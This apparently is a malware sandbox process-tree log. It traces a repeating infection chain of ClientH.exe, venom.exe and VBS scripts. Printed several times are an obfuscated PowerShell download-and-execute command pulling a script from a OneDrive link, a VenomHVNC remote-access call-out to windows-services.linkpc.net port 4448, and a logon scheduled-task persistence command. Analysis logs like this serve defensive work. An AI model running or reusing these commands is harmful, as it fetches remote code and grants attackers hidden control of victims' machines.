        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10460
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        40⤵
        
        PID:2832
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        41⤵
        
        PID:9380
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        41⤵
        
        PID:11256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        41⤵
        
        PID:11084
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        40⤵
        
        PID:11004
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        40⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8092
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        39⤵
        
        PID:10916
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        40⤵
        
        PID:1356
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        40⤵
        
        PID:9300
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        39⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        39⤵
        
        PID:11092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10016
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        41⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        38⤵
        
        PID:9732
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        39⤵
        
        PID:5292
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        39⤵
        
        PID:8528
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        38⤵
        
        PID:6792
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        39⤵
        
        PID:7060
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        38⤵
        
        PID:10320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2800
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        40⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        37⤵
        
        PID:9368
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        38⤵
        
        PID:9628
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        38⤵
        
        PID:9640
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        37⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        37⤵
        
        PID:9564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8580
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        39⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        40⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        41⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        36⤵
        
        PID:8516
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        37⤵
        
        PID:9272
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        37⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        36⤵
        
        PID:9300
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        36⤵
        
        PID:9516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8672
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        38⤵
        
        PID:10884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        39⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8664
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        35⤵
        
        PID:8808
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        36⤵
        
        PID:7752
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        36⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        35⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        35⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9248
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        37⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        38⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        39⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        34⤵
        
        PID:5712
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        35⤵
        
        PID:5624
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        35⤵
        
        PID:7680
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        34⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        34⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6556
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        36⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        37⤵
        
        PID:7640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8276
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        33⤵
        
        PID:8224
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        34⤵
        
        PID:2608
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        34⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        33⤵
        
        PID:7144
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        33⤵
        
        PID:3180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9164
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        35⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        36⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9076
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        32⤵
        
        PID:8440
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        33⤵
        
        PID:8536
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        33⤵
        
        PID:8544
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        32⤵
        
        PID:8612
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        32⤵
        
        PID:8872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6884
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        34⤵
        
        PID:8656
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        35⤵
        
        PID:7568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        36⤵
        
        PID:7332
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        31⤵
        
        PID:7332
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        32⤵
        
        PID:6068
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        32⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        31⤵
        
        PID:7572
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        31⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8640
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        33⤵
        
        PID:10816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        34⤵
        
        PID:11240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        30⤵
        
        PID:5272
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        31⤵
        
        PID:1180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        31⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        30⤵
        
        PID:1748
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        30⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2712
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        32⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        33⤵
        
        PID:10400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        34⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        29⤵
        
        PID:2028
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        30⤵
        
        PID:800
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        30⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        29⤵
        
        PID:7744
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        29⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8056
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        31⤵
        
        PID:10820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        32⤵
        
        PID:7972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10332
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        28⤵
        
        PID:3068
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        29⤵
        
        PID:2900
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        29⤵
        
        PID:8064
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        29⤵
        
        PID:6040
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        29⤵
        
        PID:7880
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        28⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        28⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7624
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        30⤵
        
        PID:10684
        
